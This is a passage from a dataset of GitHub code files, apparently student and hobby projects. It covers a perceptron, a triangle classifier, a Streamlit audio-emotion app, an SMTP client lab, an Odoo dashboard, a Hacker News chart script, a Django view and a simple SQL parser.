choice(training_data_set)\n x = training_data[0]\n y = training_data[1]\n y_hat = heaviside(dot(w, x))\n error = y - y_hat\n errors.append(error)\n weights.append(w)\n w += error * x\n return errors, weights\n\n\n\ndef print_hi(name):\n # Use a breakpoint in the code line below to debug your script.\n print(f'Hi, {name}') # Press Strg+F8 to toggle the breakpoint.\n\ndef main():\n training_data_set = [\n (array([1, 0, 0]), 0),\n (array([1, 0, 1]), 1),\n (array([1, 1, 0]), 1),\n (array([1, 1, 1]), 1),\n ]\n\n random.seed( 12 )\n w = zeros(3)\n iterations = 30\n errors, weights = fit(iterations, training_data_set, w)\n w = weights[iterations - 1]\n print(\"Gewichtsfaktor am Ende des Training:\")\n print(w)\n\n print(\"Auswertung am Ende des Trainings\")\n for x, y in training_data_set:\n y_hat = heaviside(dot(x, w))\n print(\"{}: {} -> {}\".format(x, y, y_hat))\n\n fignr = 1\n plt.figure(fignr, figsize=(10,10))\n plt.plot(errors)\n plt.style.use('seaborn-whitegrid')\n plt.xlabel('Iteration')\n plt.ylabel(r\"$(y - \\hat y)$\")\n plt.show()\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n # print_hi('PyCharm')\n main()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"henshow/ki-nb-neu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1585319612","text":"'''Faça um Programa que peça os três lados de um triângulo. O programa deverá informar se os valores podem ser\num triângulo. Indique, caso os lados formem um triângulo, se o mesmo é: equilátero, isósceles ou escaleno.'''\n\n\nlado_1 = int(input(\"Lado 1: \"))\nlado_2 = int(input(\"Lado 2: \"))\nlado_3 = int(input(\"Lado 3: \"))\n\nif lado_1 > (lado_2 + lado_3) or lado_2 > (lado_1 + lado_3) or lado_3 > (lado_1 + lado_2):\n print('Não pode ser um triangulo')\nelif lado_1 == lado_2 == lado_3:\n print ('Equilatero')\nelif lado_1 == lado_2 or lado_1 == lado_3 or lado_2 == lado_3:\n print('Isósceles')\nelse:\n print('Escaleno')\n","repo_name":"Lia-Pires/DB1Start","sub_path":"02_estruturas_condicionais_exercicios/ex014_estruturas_condicionais.py","file_name":"ex014_estruturas_condicionais.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73993300214","text":"# import necessary modules\nimport streamlit as st\nimport random\n\n# import app modules (controller, service, and view)\nfrom controller.df_dataset import dataset_df\nfrom controller.mfcc import create_mfcc, create_resized_mfcc\nfrom controller.cnn import train, test, predict\nfrom service.split_data import make_train_test_split\nfrom view.plot import distribution, show_random_plot, confusion_matrix, show_mfcc, plot_history\nfrom view.config import get_config\n\n# prepare current page config, set the page's title\nget_config(\"Machine Modeling\")\n\n# prepare all needed session states to make interactive interaction\nif \"preprocessing\" not in st.session_state: st.session_state[\"preprocessing\"] = False\nif \"train\" not in st.session_state: st.session_state[\"train\"] = False\nif \"test\" not in st.session_state: st.session_state[\"test\"] = False\nif \"model\" not in st.session_state: st.session_state[\"model\"] = False\nif \"x_mean\" not in st.session_state: st.session_state[\"x_mean\"] = False\nif \"x_std\" not in st.session_state: st.session_state[\"x_std\"] = False\n\n# start the machine modeling page\n# used for preprocessing dataset, training and testing model\ndef start():\n # show the page title\n st.write(\"<h1 style='text-align: center;'>Machine Modeling</h1>\", unsafe_allow_html = True)\n\n # show training dataset section\n st.write(\"### Training Dataset\")\n # set imported dataset to global\n global df\n # load dataset\n df = dataset_df('dataset')\n # show dataset\n st.dataframe(df, 500)\n\n # show message and button for next interaction (preprocessing)\n st.write(\"Dataset have been loaded, let's preprocess them!\")\n # set the preprocessing state to true if user click the button\n if st.button(\"Preprocessing\", type = \"primary\"):\n st.session_state[\"preprocessing\"] = True\n \n# preprocessing function to start preprocessing\ndef preprocessing():\n # show sample distribution\n st.write(\"### Sample Distribution\")\n distribution(df)\n\n # random one pick sample\n st.write(\"### Random Pick Sample\")\n # split dataset to happy and sad based on their label, reset the dataframe index\n happy_df = df.loc[df[\"Label\"] == \"happy\"].reset_index(drop = True)\n sad_df = df.loc[df[\"Label\"] == \"sad\"].reset_index(drop = True)\n\n # plot 1 happy and 1 sad dataset\n st.write(\"#### Happy\")\n show_random_plot(happy_df)\n st.write(\"#### Sad\")\n show_random_plot(sad_df)\n\n # create the mfcc from each audio path\n mfccs = create_mfcc(df)\n # set the new_mfccs as global to be used in other function\n global new_mfccs\n # get the new mfccs (with the equal column number) and get the average column number of old mfccs\n new_mfccs, average_cols = create_resized_mfcc(mfccs)\n\n # show the average mfccs column (old mfccs)\n st.write(\"### Average MFCCs Column\")\n st.metric(\"Average\", average_cols)\n\n # pick one random index to show the difference of old and new mfcc\n index = random.randint(0, df.shape[0])\n # show picked mfcc, before and after equalization\n st.write(\"### MFCC Comparison\")\n show_mfcc(df.Path[index], new_mfccs[index])\n\n # x_tr => training data, y_tr => training label\n # x_va => validation data, y_va => validation label\n # x_te => testing data, y_te => testing label\n global x_tr, y_tr, x_va, y_va, x_te, y_te\n\n # split the dataset into training, validation, and testing\n x_tr, y_tr, x_va, y_va, x_te, y_te = make_train_test_split(new_mfccs, df)\n\n # show the shape of mfccs distribution (training, validation, testing)\n st.write(\"### MFCCs Distribution\")\n col1, col2, col3 = st.columns(3)\n col1.metric(\"Train\", str(x_tr.shape))\n col2.metric(\"Validation\", str(x_va.shape))\n col3.metric(\"Test\", str(x_te.shape))\n\n# start training process\ndef start_train():\n # show the training process section\n st.write(\"### Training Process\")\n # start training\n model, history = train(x_tr, y_tr, x_va, y_va)\n # store the trained model in session state to be used in another function and page\n st.session_state[\"model\"] = model\n # plot the training history (loss, validaton loss, accuracy, and validation accuracy)\n plot_history(history)\n\n# start testing process\ndef start_test():\n # show the testing process section\n st.write(\"### Testing Process\")\n # get the trained model from session state\n trained_model = st.session_state[\"model\"]\n # test the model using testing data (return the loss and accuracy)\n loss, accuracy = test(trained_model, x_te, y_te)\n # get the prediction, precision, recall, and f1 score\n prediction, precision, recall, f1 = predict(trained_model, x_te, y_te)\n\n # display the testing metrics (loss, accuracy, precision, recall, and f1)\n col1, col2, col3, col4, col5 = st.columns(5)\n col1.metric(\"Loss\", \"{:.4f}\".format(loss))\n col2.metric(\"Accuracy\", \"{:.4f}\".format(accuracy))\n col3.metric(\"Precision\", \"{:.4f}\".format(precision))\n col4.metric(\"Recall\", \"{:.4}\".format(recall))\n col5.metric(\"F1\", \"{:.4}\".format(f1))\n\n # plot the confusion matrix\n st.write(\"### Confusion Matrix\")\n confusion_matrix(y_te, prediction)\n\n# call start() function at the first time page load\nif __name__ == \"__main__\":\n start()\n\n# if the preprocessing state is true\nif st.session_state[\"preprocessing\"]:\n # start preprocessing\n preprocessing()\n # show message and button for next interaction (testing)\n st.write(\"The dataset have been preprocessed, let's train them using CNN!\")\n # if training button pressed, change train state to true\n if st.button(\"Training\", type = \"primary\"):\n st.session_state[\"train\"] = True\n\n# if the train state is true\nif st.session_state[\"train\"]:\n # start training process\n start_train()\n # show message and button for next interaction (testing)\n st.write(\"Training model fisinh, let's check the accuration with testing dataset!\")\n # if testing button pressed, change test state to true\n if st.button(\"Testing\", type = \"primary\"):\n st.session_state[\"test\"] = True\n\n# if the test state is true\nif st.session_state[\"test\"]:\n # start testing process\n start_test()\n\n# code by @tudemaha","repo_name":"tudemaha/speech-emotion-classification","sub_path":"view/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"11809232295","text":"import base64\nfrom socket import *\n\nfrom pip._vendor.distlib.compat import raw_input\n\nmsg = \"\\r\\n I love computer networks!\"\n\nendmsg = \"\\r\\n.\\r\\n\"\n\n# Choose a mail server (e.g. Google mail server) and call it mailserver\n\n# Create socket called clientSocket and establish a TCP connection with mailserver\n\n# Fill in start\nMailServer = \"mail.smtp2go.com\"\nMailPort = 80\nserverPort = (MailServer, MailPort)\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect(serverPort)\n\nrecv = clientSocket.recv(1024)\nprint(\"Message after connection request: \", recv.decode())\n\nif recv[:3] != '220':\n print('220 reply not received from server.\\n')\n# Fill in end\n\n\n# Send HELO command and print server response.\n\nhelloCommand = 'HELLO Alice\\r\\n'\nclientSocket.send(helloCommand.encode())\nrecv1 = clientSocket.recv(1024)\nprint(\"\\nSend HELO command and print server response:\", recv1.decode())\n\nif recv1[:3] != '250':\n print('250 reply not received from server.\\n')\n\n# Fill in start\nmailFromCommand = 'MAIL FROM: <sender@email.com> \\r\\n'\nclientSocket.send(mailFromCommand.encode())\nrecv2 = clientSocket.recv(1024)\nprint(\"After MAIL FROM command:\", recv2.decode())\n# Fill in end\n\n# Send RCPT TO command and print server response.\n\n# Fill in start\nrcptTo = \"RCPT TO: <destination@email.com> \\r\\n\"\nclientSocket.send(rcptTo.encode())\nrecv3 = clientSocket.recv(1024)\nprint(\"After RCPT TO command: \", recv3.decode())\nif recv1[:3] != '250':\n print('250 reply not received from server.\\n')\n\n# Fill in end\n\n# Send DATA command and print server response.\ndataCommand = 'DATA\\r\\n'\n# Fill in start\nclientSocket.send(dataCommand.encode())\nrecv4 = clientSocket.recv(1024)\nprint(\"After DATA command: \", recv4.decode())\nif recv1[:3] != '250':\n print('250 reply not received from server.\\n')\n# Fill in end #\n\n# Send message data.\n\n# Fill in start\nsubject = \"Subject: SMTP mail client testing \\r\\n\\r\\n\"\nclientSocket.send(subject.encode())\n\nmessage = raw_input(\"Enter message here: \\r\\n\")\n\n# Fill in end\n\n# Message ends with a single period.\nmailEndMsg = \"\\r\\n.\\r\\n\"\n\n# Fill in start\nclientSocket.send(message.encode())\nclientSocket.send(mailEndMsg.encode())\n\nrecv5 = clientSocket.recv(1024)\nprint(\"Response after sending message body:\", recv5.decode())\n\n# Fill in end\n\n# Send QUIT command and get server response.\n\n# Fill in start\nquitCommand = \"QUIT\\r\\n\"\nclientSocket.send(quitCommand.encode())\nrecv6 = clientSocket.recv(1024)\nprint(recv6.decode())\nprint(quitCommand)\n# Fill in end\nclientSocket.close()\n","repo_name":"Khoameocr85/SMTPlab","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22971747669","text":"from xml.etree import ElementTree\nfrom odoo import models, fields, api, _\nimport datetime\nimport pytz\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass DashboardProject(models.Model):\n _name = 'vnitpro.project.dashboard'\n\n name = fields.Char('Name', compute=\"_compute_by_status\", translate=True, store=True)\n status = fields.Selection(\n [(1, 'Project Draft'), (2, 'Project Confirmed'), (3, 'In Process'), (4, 'Finish'), (5, 'On Hold'),\n (6, 'Cancel')], 'Status', default=1, required=True)\n\n color = fields.Integer('Color', default=3)\n\n count_record = fields.Integer('Count Record', compute=\"_compute_by_status\")\n count_expire_today = fields.Integer('Count Expire Today', compute=\"_compute_by_status\")\n count_out_of_date = fields.Integer('Count Out Of Date', compute=\"_compute_by_status\")\n count_unexpired = fields.Integer('Count Unexpired', compute=\"_compute_by_status\")\n\n def get_today(self):\n time = datetime.datetime.now()\n tz_current = pytz.timezone(self._context.get('tz') or 'UTC') # get timezone user\n tz_database = pytz.timezone('UTC')\n time = tz_database.localize(time)\n time = time.astimezone(tz_current)\n today_w_timezone = time.strftime('%Y-%m-%d')\n return today_w_timezone\n\n def get_context_with_status(self):\n context = {}\n # (1, 'Project Draft'), (2, 'Project Confirmed'), (3, 'In Process'), (4, 'Finish'), (5, 'On Hold'), (6, 'Cancel')\n if self.status == 1:\n context = {'search_default_project_draft': 1}\n elif self.status == 2:\n context = {'search_default_project_confirmed': 1}\n elif self.status == 3:\n context = {'search_default_project_in_process': 1}\n elif self.status == 4:\n context = {'search_default_project_finish': 1}\n elif self.status == 5:\n context = {'search_default_project_on_hold': 1}\n elif self.status == 6:\n context = {'search_default_project_cancel': 1}\n return context\n\n def get_action_project_with_status(self):\n context = self.get_context_with_status()\n return {\n 'name': self.display_name,\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'vnitpro.project',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'nodestroy': True,\n 'context': str(context)\n }\n\n def get_action_picking_tree_expire_today(self):\n context = {'search_default_expire_today': 1}\n context.update(self.get_context_with_status())\n return {\n 'name': self.display_name,\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'vnitpro.project',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'nodestroy': True,\n 'context': str(context)\n }\n\n def get_action_picking_tree_unexpired(self):\n context = {'search_default_unexpired': 1}\n context.update(self.get_context_with_status())\n return {\n 'name': self.display_name,\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'vnitpro.project',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'nodestroy': True,\n 'context': str(context)\n }\n\n def get_action_picking_tree_out_of_date(self):\n context = {'search_default_out_of_date': 1}\n context.update(self.get_context_with_status())\n return {\n 'name': self.display_name,\n 'view_type': 'form',\n 'view_mode': 'tree,form',\n 'res_model': 'vnitpro.project',\n 'type': 'ir.actions.act_window',\n 'target': 'current',\n 'nodestroy': True,\n 'context': str(context)\n }\n\n @api.one\n @api.depends('status')\n def _compute_by_status(self):\n if self.status:\n time = self.get_today()\n self.name = dict(self._fields['status'].selection).get(self.status)\n domains = []\n # (1, 'Project Draft'), (2, 'Project Confirmed'), (3, 'In Process'), (4, 'Finish'), (5, 'On Hold'), (6, 'Cancel')\n if self.status == 1:\n domains = [('status', '=', 1)]\n elif self.status == 2:\n domains = ['&', '|', '|', '|', ('status', '=', 3), ('status', '=', 4),\n ('status', '=', 5), ('status', '=', 6), ('status', '=', 2)]\n elif self.status == 3:\n domains = [('status', '=', 3)]\n elif self.status == 4:\n domains = [('status', '=', 4)]\n elif self.status == 5:\n domains = [('status', '=', 5)]\n elif self.status == 6:\n domains = [('status', '=', 6)]\n self.count_expire_today = len(self.env['vnitpro.project'].search(\n domains + [('expire_date', '=', time)]))\n self.count_unexpired = len(self.env['vnitpro.project'].search(\n domains + [('expire_date', '>', time)]))\n self.count_out_of_date = len(self.env['vnitpro.project'].search(\n domains + [('expire_date', '<', time)]))\n self.count_record = self.count_expire_today + self.count_unexpired + self.count_out_of_date\n","repo_name":"tu2305/VNITPro_erp","sub_path":"vnitpro_project/models/project_dashboard.py","file_name":"project_dashboard.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18121104695","text":"# Ex -> Using the data from hn_submissions.py, make a bar chart showing the most active discussions currently happening on Hacker News. The height of each bar should correspond to the number of comments each submission has. The label for each bar should include the submission’s title and act as a link to the discussion page for that submission. If you get a KeyError when creating a chart, use a try-except block to skip over the promotional posts.\n\nimport requests\nfrom operator import itemgetter\nimport json\nimport plotly.express as px\n\n# Make API call and store the response\nurl = \"https://hacker-news.firebaseio.com/v0/topstories.json\"\nr = requests.get(url)\nprint(f\"Status code :{r.status_code}\")\n\n# Explore Data\nsubmission_ids = r.json()\nsubmission_dicts = []\nfor submission_id in submission_ids[:10]:\n # Make a new API call for each submission\n url = f\"https://hacker-news.firebaseio.com/v0/item/{submission_id}.json\"\n r = requests.get(url)\n print(f\"id : {submission_id}\\tstatus: {r.status_code}\")\n response_dict = r.json()\n\n # Build a dictionary dor each article\n submission_dict = {\n 'title': response_dict['title'],\n 'hn_link': f\"https://news.ycombinator.com/item?id={submission_id}\",\n 'comments': response_dict['descendants']\n }\n\n submission_dicts.append(submission_dict)\n\nsubmission_dicts = sorted(submission_dicts, key=itemgetter('comments'),\n reverse=True)\n\nprint(submission_dicts)\ntitles, hn_links, comments = [], [], []\nfor submission_dict in submission_dicts:\n titles.append(submission_dict['title'])\n link = f\"<a href='{'hn_link'}'>{submission_dict['title']}</a>\"\n hn_links.append(link)\n comments.append(submission_dict['comments'])\n\ntitle = \"Most Commented articles on Hacker News\"\nlabels = {'x': 'Repository', 'y': 'Comments'}\nfig = px.bar(x=hn_links, y=comments, title=title,\n labels=labels, hover_name=titles)\n\nfig.update_layout(title_font_size=28, xaxis_title_font_size=20,\n yaxis_title_font_size=20)\nfig.update_traces(marker_color='SteelBlue', marker_opacity=0.6)\nfig.show()\n","repo_name":"mcms95/Data-visualization","sub_path":"Chapter 17 - API's/17-2. Active Discussions.py","file_name":"17-2. Active Discussions.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37089758058","text":"from django.views.decorators.csrf import csrf_exempt\nfrom abc import ABC, abstractmethod\nfrom django.http.response import JsonResponse\nfrom PyCommerce.models import inventoryDetails\nfrom api.update.invBalance import update_inv_balance\nfrom api.update.checkBalance import check_inv_balance\nimport json\n\n\nclass IUpdateInventoryDetail(ABC):\n @abstractmethod\n def update_inv_detail():\n pass\n\n\nclass UpdateInvDetail():\n @csrf_exempt\n def update_inv_detail(self, request, id):\n response = False\n if request.method == \"POST\":\n response = True\n data = json.loads(request.body)\n if data['TransType_id'] == 2:\n check_balance = check_inv_balance(\n data['ProductId_id'], data['StoreId_id'], data['Quantity'], id)\n if check_balance == True:\n inventoryDetails.objects.filter(id=id).update(**data)\n update_inv_balance(data, id)\n else:\n response = False\n else:\n inventoryDetails.objects.filter(id=id).update(**data)\n update_inv_balance(data)\n return JsonResponse(response, safe=False)\n\n\nupdate_inv_detail = UpdateInvDetail().update_inv_detail\n","repo_name":"abdullah-ezzat/pycommerce","sub_path":"api/update/updateInvDetail.py","file_name":"updateInvDetail.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28811971606","text":"'''\nCreated On: Aug 29, 2019\nAuthor: Deepti\n\nBuild an SQL parser through CLI\n'''\n\n\n# TO DO : Check errors\n\nimport re\nimport sys\nimport csv\n\n\n# First things first : read metadata from metadata.txt\nMETA = './files/metadata.txt'\ntables_list = {} # Since multiple tables\ntables_needed = {}\n\nAGG = ['distinct', 'max', 'sum', 'avg', 'min']\n\ndef read_metadata(file):\n '''\n Get structure of multiple tables\n '''\n begin = 0\n\n table_name = \"\"\n try:\n struct_file = open(file, 'r')\n except IOError:\n sys.stderr.write(\"Error: No meta-structure found.\\n\")\n quit(-1)\n\n for line in struct_file:\n line = line.strip() # Remove white spaces\n if line == '<begin_table>':\n begin = 1\n continue\n if begin == 1:\n table_name = line\n tables_list[table_name] = []\n begin = 0\n elif line != \"<end_table>\":\n tables_list[table_name].append(line)\n\ndef get_datacolumns(table_name):\n '''\n Read data in table ka file\n '''\n file = './files/' + table_name + '.csv'\n data = []\n try:\n src = open(file, \"rt\")\n except IOError:\n sys.stderr.write(\"Error: No corresponding .csv file found.\\n\")\n quit(-1)\n\n info = csv.reader(src)\n for row in info:\n data.append(row)\n src.close()\n return data\n\ndef parse_query(line):\n '''\n Parse query\n '''\n columns = []\n functions = []\n distincts = []\n dist_pair = []\n\n tables_inquery = []\n\n words = (re.sub(' +', ' ', line)).strip()\n\n # Check for table name:\n if 'from' not in words.split():\n sys.stderr.write(\"Error: No table name mentioned in query.\\n\")\n quit(-1)\n words = words.split('from')\n stripped = [(re.sub(' +', ' ', word)).strip() for word in words]\n clauses = [(re.sub(' +', ' ', word)).strip() for word in stripped[1].split(\"where\")]\n tables_inquery = [(re.sub(' +', ' ', word)).strip() for word in clauses[0].split(\",\")]\n for table in tables_inquery:\n if table not in tables_list:\n sys.stderr.write(\"Error: Table name is not valid.\\n\")\n quit(-1)\n tables_needed[table] = get_datacolumns(table)\n\n needed = [(re.sub(' +', ' ', word)).strip() for word in stripped[0][7:].split(',')]\n\n for condition in needed:\n if \"distinct\" in condition.lower():\n dist_pair.append(['distinct', condition.split('distinct')[1].strip(), \\\n needed[(needed.index(condition))+1]])\n continue\n if \"distinct\" in needed[(needed.index(condition))-1].lower():\n continue\n\n part_of_agg = False\n for func in AGG:\n if func + '(' in condition.lower():\n if ')' not in condition:\n sys.stderr.write(\"Error: Closing Bracket not found in query.\\n\")\n quit(-1)\n splitter = func + '('\n part_of_agg = True\n if func == 'distinct':\n distincts.append(condition.strip(')').split(splitter)[1])\n else:\n functions.append([func, condition.strip(')').split(splitter)[1]])\n break\n if not part_of_agg:\n if condition != '':\n columns.append(condition.strip('()'))\n\n # print(columns, functions, distincts, dist_pair)\n # Now that we got all that we needed\n if len(clauses) > 1:\n execute(columns, functions, distincts, dist_pair, tables_inquery, clauses[1])\n else:\n execute(columns, functions, distincts, dist_pair, tables_inquery)\n\ndef execute(columns, functions, distincts, dist_pair, tables_inquery, clauses=[]):\n '''\n Execute depending on parameters passed into this function\n '''\n if len(dist_pair) != 0:\n distinct_pair_process(dist_pair, tables_inquery)\n elif len(functions) > 0:\n process_func(clauses, columns, tables_inquery, functions) # since only single column\n elif len(tables_inquery) == 1:\n normal_where(clauses, columns, tables_inquery[0])\n elif len(tables_inquery) > 1 and len(clauses) == 0:\n join(columns, tables_inquery)\n elif len(tables_inquery) > 1 and len(clauses) > 0:\n join_where(clauses, columns, tables_inquery)\n\ndef process_func(clauses, columns, tables, functions):\n '''\n Process Min, Max, Avg, Sum\n '''\n for abc in functions:\n columns = []\n func = abc[0]\n columns.append(abc[1])\n table, column = '', ''\n if '.' in columns[0]:\n table, column = columns[0].split('.')\n else:\n count = 0\n for tab in tables:\n if columns[0] in tables_list[tab]:\n table = tab\n column = columns[0]\n count += 1\n if count > 1 or count == 0:\n sys.stderr.write(\"Error: Column name not defined correctly.\\n\")\n quit(-1)\n\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n\n if(len(clauses) == 1):\n clausey = [(re.sub(' +', ' ', i)).strip() for i in clauses.split()]\n\n if(len(clauses) == 1) and columns[0] in clausey:\n data = []\n for row in tables_needed[table]:\n evaluator = solve(row, table, clauses)\n if eval(evaluator):\n for column in columns:\n data.append(float(row[tables_list[table].index(column)]))\n else:\n data = []\n for row in tables_needed[table]:\n for column in columns:\n data.append(float(row[tables_list[table].index(column)]))\n \n result = 0\n if func.lower() == 'avg':\n result += sum(data) / len(data)\n elif func.lower() == 'sum':\n result += sum(data)\n elif func.lower() == 'max':\n result = max(data)\n elif func.lower() == 'min':\n result = min(data)\n\n print(result)\n\ndef distinct_pair_process(dist_pair, tables):\n columns_in_table = {}\n tables_found = []\n\n for column in [dist_pair[0][1], dist_pair[0][2]]:\n table, column = search_column(column, tables)\n if table not in columns_in_table.keys():\n columns_in_table[table] = []\n tables_found.append(table)\n columns_in_table[table].append(column)\n # print(tables_found, columns_in_table)\n\n if len(tables_found) > 1:\n data_injoin = []\n for item1 in tables_needed[tables_found[0]]:\n for item2 in tables_needed[tables_found[1]]:\n data_injoin.append(item1 + item2)\n display_output(tables_found, columns_in_table, data_injoin, join=True, distinct=True)\n else:\n table = tables_found[0]\n columns = columns_in_table[table]\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n result = []\n for row in tables_needed[table]:\n ans = ''\n for column in columns:\n ans += row[tables_list[table].index(column)] + '\\t|'\n if ans.strip('\\t|') not in result:\n result.append(ans.strip('\\t|'))\n for row in result:\n print(row)\n\n\ndef normal_where(clauses, columns, table):\n if len(columns) == 1 and columns[0] == '*' and len(clauses) == 0:\n columns = tables_list[table]\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n for data in tables_needed[table]:\n ans = ''\n for column in columns:\n ans += data[tables_list[table].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n \n elif len(clauses) == 0:\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n for row in tables_needed[table]:\n ans = ''\n for column in columns:\n ans += row[tables_list[table].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n \n elif len(clauses) >= 1:\n if len(columns) == 1 and columns[0] == '*':\n columns = tables_list[table]\n print(bring_forth(table, columns))\n print(\"-\"*len(bring_forth(table, columns)))\n for row in tables_needed[table]:\n evaluator = solve(row, table, clauses)\n ans = ''\n if eval(evaluator):\n for column in columns:\n ans += row[tables_list[table].index(column)] + '\\t|'\n print(ans.strip('\\t|'))\n\ndef join_where(clauses, columns, tables):\n operators = ['>=', '<=', '>', '<', '=']\n now = ''\n og = clauses\n if 'and' in clauses:\n clauses = clauses.split('and')\n now = 'and'\n elif 'or' in clauses:\n clauses = clauses.split('or')\n now = 'or'\n else:\n clauses = [clauses]\n if len(clauses) > 2:\n sys.stderr.write(\"Error: Only two clauses joined by ONE or/and is viable.\\n\")\n quit(-1)\n # print(clauses)\n \n condition1 = clauses[0]\n for operator in operators:\n if operator in condition1:\n condition1 = condition1.split(operator)\n\n if len(condition1) == 2 and '.' in condition1[1]:\n condition_join(condition1, columns, tables)\n else:\n join_conditionally(now, clauses, columns, tables)\n\ndef condition_join(clauses, columns, tables):\n '''\n With a condition\n '''\n if len(clauses) > 2:\n sys.stderr.write(\"Error: Join condition invalid\\n\")\n quit(-1)\n \n conditional_columns = [(re.sub(' +', ' ', word)).strip() for word in clauses]\n \n columns_cond = {}\n tables_found = []\n for column in conditional_columns:\n table, column = search_column(column, tables)\n if table not in columns_cond.keys():\n columns_cond[table] = []\n tables_found.append(table)\n columns_cond[table].append(column)\n keep = []\n\n column1 = tables_list[tables[0]].index(columns_cond[tables[0]][0])\n column2 = tables_list[tables[1]].index(columns_cond[tables[1]][0])\n\n for data in tables_needed[tables[0]]:\n for row in tables_needed[tables[1]]:\n evaluator = data[column1] + '==' + row[column2]\n if eval(evaluator):\n keep.append(data + row)\n \n final_columns = {}\n final_tables = []\n\n flag = 0\n if len(columns) == 1 and columns[0] == '*':\n for table in tables:\n final_columns[table] = []\n for column in tables_list[table]:\n if column in columns_cond[table]:\n if flag == 0:\n final_columns[table].append(column)\n flag = 1\n continue\n else:\n final_columns[table].append(column)\n final_tables = tables\n else:\n for column in columns:\n table, column = search_column(column, tables)\n if table not in final_columns.keys():\n final_columns[table] = []\n final_tables.append(table)\n final_columns[table].append(column)\n\n display_output(final_tables, final_columns, keep, join=True)\n\n\ndef join_conditionally(now, clauses, columns, tables):\n '''\n Without a condition\n '''\n data = join_data(clauses, columns, tables)\n columns_in_table = {}\n tables_found = []\n if columns[0] == '*':\n if len(columns) != 1:\n sys.stderr.write(\"Error: Select function invalid\\n\")\n quit(-1)\n for table in tables:\n columns_in_table[table] = []\n for column in tables_list[table]:\n columns_in_table[table].append(column)\n tables_found = tables\n else:\n for column in columns:\n table, column = search_column(column, tables)\n if table not in columns_in_table.keys():\n tables_found.append(table)\n columns_in_table[table] = []\n columns_in_table[table].append(column)\n\n final_data = []\n if now == 'and':\n for obja in data[tables[0]]:\n for objb in data[tables[1]]:\n final_data.append(obja + objb)\n elif now == 'or':\n for obja in data[tables[0]]:\n for objb in tables_needed[tables[1]]:\n if objb not in data[tables[1]]:\n final_data.append(obja + objb)\n for item1 in data[tables[1]]:\n for item2 in tables_needed[tables[0]]:\n if item2 not in data[tables[0]]:\n final_data.append(item2 + item1)\n for obja in data[tables[0]]:\n for objb in data[tables[1]]:\n final_data.append(obja + objb)\n else:\n table1 = list(data.keys())[0]\n flag = False\n table2 = tables_found[1]\n if table1 == tables_found[1]:\n table2 = tables_found[0]\n flag = True\n\n for obja in data[table1]:\n for objb in tables_needed[table2]:\n if flag:\n final_data.append(objb + obja)\n else:\n final_data.append(obja + objb)\n display_output(tables_found, columns_in_table, final_data, join=True)\n\ndef join_data(clauses, columns, tables):\n operators = ['<=','>=','<', '>', '=']\n needed_data = {}\n for query in clauses:\n needed = []\n for operator in operators:\n if operator in query:\n needed = query.split(operator)\n break\n needed = [(re.sub(' +', ' ', word)).strip() for word in needed]\n table, column = search_column(needed[0], tables)\n needed_data[table] = []\n query = query.replace(needed[0], ' ' + column + ' ')\n for data in tables_needed[table]:\n evaluator = solve(data, table, query)\n try:\n if eval(evaluator):\n needed_data[table].append(data)\n # print(needed_data)\n except NameError:\n sys.stderr.write(\"Error: Invalid condition\\n\")\n quit(-1)\n return needed_data\n\ndef join(columns, tables):\n '''\n Display columns from two or more tables\n '''\n columns_in_table = {}\n tables_found = []\n if len(columns) == 1 and columns[0] == '*':\n for table in tables:\n columns_in_table[table] = []\n for column in tables_list[table]:\n columns_in_table[table].append(column)\n tables_found = tables\n else:\n for column in columns:\n table, column = search_column(column, tables)\n if table not in columns_in_table.keys():\n columns_in_table[table] = []\n tables_found.append(table)\n columns_in_table[table].append(column)\n \n data_injoin = []\n\n # print(tables_found, columns)\n if len(tables_found) == 2:\n for item1 in tables_needed[tables_found[0]]:\n for item2 in tables_needed[tables_found[1]]:\n data_injoin.append(item1 + item2)\n display_output(tables_found, columns_in_table, data_injoin, join=True)\n else:\n display_output(tables_found, columns_in_table)\n \n\ndef bring_forth(table, columns):\n string = ''\n for column in columns:\n if string != '':\n string += '|'\n string += table + '.' + column\n return string\n\ndef solve(row, table, clauses):\n evaluator = ''\n clauses = [(re.sub(' +', ' ', i)).strip() for i in clauses.split()]\n for condition in clauses:\n if condition == '=':\n evaluator += condition * 2\n elif condition.lower() == 'and' or condition.lower() == 'or':\n evaluator += ' ' + condition.lower() + ' '\n elif '.' in condition:\n table_found, column = search_column(condition, [table])\n evaluator += row[tables_list[table_found].index(column)]\n elif condition in tables_list[table]:\n evaluator += row[tables_list[table].index(condition)]\n else:\n evaluator += 